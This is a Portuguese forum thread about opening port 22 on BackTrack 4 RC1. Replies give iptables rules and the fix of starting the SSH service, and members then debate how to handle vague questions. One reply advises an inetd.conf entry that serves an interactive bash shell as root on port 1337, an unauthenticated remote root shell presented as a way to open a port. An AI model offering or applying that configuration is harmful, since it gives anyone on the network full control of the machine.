Page 1 of 3 123 LastLast
Results 1 to 10 of 26

Thread: [rede] liberar porta 22 no backtrack 4 RC1

Just burned his ISO

Default [rede] liberar porta 22 no backtrack 4 RC1

Boa galera

Estou tentando liberar porta 22 no backtrack com o iptables so que não ta liberando

coloquei varias regras e não obtive sucesso alguem poderia me ajudar?

Moderator santiagocyl's Avatar

Default Re: [rede] liberar porta 22 no backtrack 4 RC1

Olá,

Acho improvável que você consiga ajuda se não fornecer maiores detalhes sobre o seu problema. Não sabemos quais passos você executou, não sabemos quais mensagens de erro obteve, nem mesmo conhecemos o ambiente no qual você está executando o bt4. Tente melhorar sua pergunta seguindo as dicas colocadas neste post aqui.

Além disso, porque você está usando o bt4 rc1 ao invés do final?

Senior Member Bhior's Avatar

Ola,

Para abrir portas em sistemas operacionais linux, vc deve editar dois arquivos são o /etc/services e /etc/inetd.conf.
    as linhas são organizadas assim:

Bhior 1337/tcp BT4 #Porta aberta para tal coisa
    nome porta/protocolo apelido #comentário

No /etc/inetd.conf

Bhior stream tcp nowait root /bin/bash /bin/bash -i

Pesquise sobre esse arquivos.

Abraços
    Last edited by Bhior; 09-23-2010 at 10:42 AM.

Good friend of the forums espreto's Avatar

Só não respondi o post anteriormente, levando em conta o post do moderador. Sendo assim:

Code:
    # Politica INPUT
    iptables -A INPUT -i eth1 -p tcp -s 192.168.1.0\24 --dport 22 --syn -m state --state NEW -j ACCEPT

# Politica OUTPUT
    iptables -A OUTPUT -p tcp --dport 22 --syn -m state --state NEW -j ACCEPT
    Claro que existe outras regras além destas, mais fica para seu estudo!

Att,
    (gdb) disass m(y_br)ain

®

Good friend of the forums spawn's Avatar

Vou assumir que você deseja conectar no Backtrack por SSH, para tal, inicie o serviço.
    Que eu me lembre o Backtrack não possui regras no firewall, sendo assim, POLICY ACCEPT, basta ter o serviço "escutando" na devida porta e conectar-se a ela.

[] 's

spawn

Just burned his ISO

Boas galera Muito obrigado pela atenção..

Conseguir resolver meu problema a porta 22 liberada o problema era eu rodar o serviço ssh no bakctrack

fiz o seguinte

/etc/init.d/ssh start

Valeu mesmo pela atenção de todos..

By user777

Moderator santiagocyl's Avatar

Vejam bem senhores, três respostas diferentes, todas certas, somente uma (a mais óbvia, e o primeiro passo que ele deveria ter dado) resolve o problema do usuário. Eu não me importo que respondam aos usuários, aliás o fórum serve para isso. Mas ao invés de darmos peixes, deveríamos ensinar a pescar.

Por outro lado, o usuário segue cegamente os passos indicados por nós, sem entender o que está fazendo. Entendem como isso por ser perigoso, e porque deve ser evitado? De qualquer forma, é muito bom poder contar com a boa vontade e competência de todos, fato comprovado por TODAS as respostas indicadas acima.

Good friend of the forums spawn's Avatar

Quote Originally Posted by spawn View Post
    Vou assumir que você deseja conectar no Backtrack por SSH, para tal, inicie o serviço.
    era só iniciar o serviço mesmo

Senior Member Bhior's Avatar

Ola senhores,

Seria mais fácil se o usuário informasse com exatidão o que ele realmente queria.

Cyl, a respeito de sua sugestão, crio que seria o certo, desde que o usuário saiba o que ele quer, pois muita informação vai deixa-lo mais confuso.
    Tiro essa base sobre uma duvida de outro membro a respeito da atualização do metasploit, se ele conseguisse atualizar com as dicas dadas (ele seria a pessoal mais feliz do mundo), mas seu alguém fosse explicar todo funcionamento do sub version, ele so iria fica mais perdido, quem vai receber a dica, tem que saber o que ele quer.
    Não estou dizendo que esta errado, temos que seguir nesse rumo, mas um pouco devagar...
    Temos que divulgar mais aquele tópico de como criar tópicos para chegamos nesse patamar.

Abraços

Good friend of the forums espreto's Avatar

Seria mais fácil se o usuário informasse com exatidão o que ele realmente queria.
    Com certeza, seria um mundo ideal, mas infelizmente muitos usuários querem tudo mastigado e complica chegar nesse ponto.

Tiro essa base sobre uma duvida de outro membro a respeito da atualização do metasploit, se ele conseguisse atualizar com as dicas dadas (ele seria a pessoal mais feliz do mundo), mas seu alguém fosse explicar todo funcionamento do sub version, ele so iria fica mais perdido...
    Vou me basear em seu exemplo, se o membro está com dificuldade para atualizar o metasploit, e não tem a mínima capacidade de pesquisar, tentar resolver suas dificuldades por si só e ainda chega aqui no fórum e posta a seguir dúvida: "Não consigo atualizar meu metasploit, alguem me ajuda urgente!", poxa ai complica. Se o "cara" está com dificuldades em algo simples, não acho que o Backtrack seja a melhor distribuição pra ele no momento, visto que seu foco é outro.

Não estou dizendo que esta errado, temos que seguir nesse rumo, mas um pouco devagar...
    Não temos que ser devegar, se possível, repare como os moderadores do EUA tratam as perguntas "ineficientes". Santiagocyl é o único que segue o mesmo ritmo.

Temos que divulgar mais aquele tópico de como criar tópicos para chegamos nesse patamar.
    Isso sim, eu concordo plenamente!

Bhior, não entenda tudo isso como uma crítica à você e sim como o meu ponto de vista.

Moderadores: Infelizmente tive que sair do escopo do tópico para escrever este meu ponto de vista, fiquem à vontade para movê-lo ou apagá-lo.

Att,
    (gdb) disass m(y_br)ain

®

Page 1 of 3 123 LastLast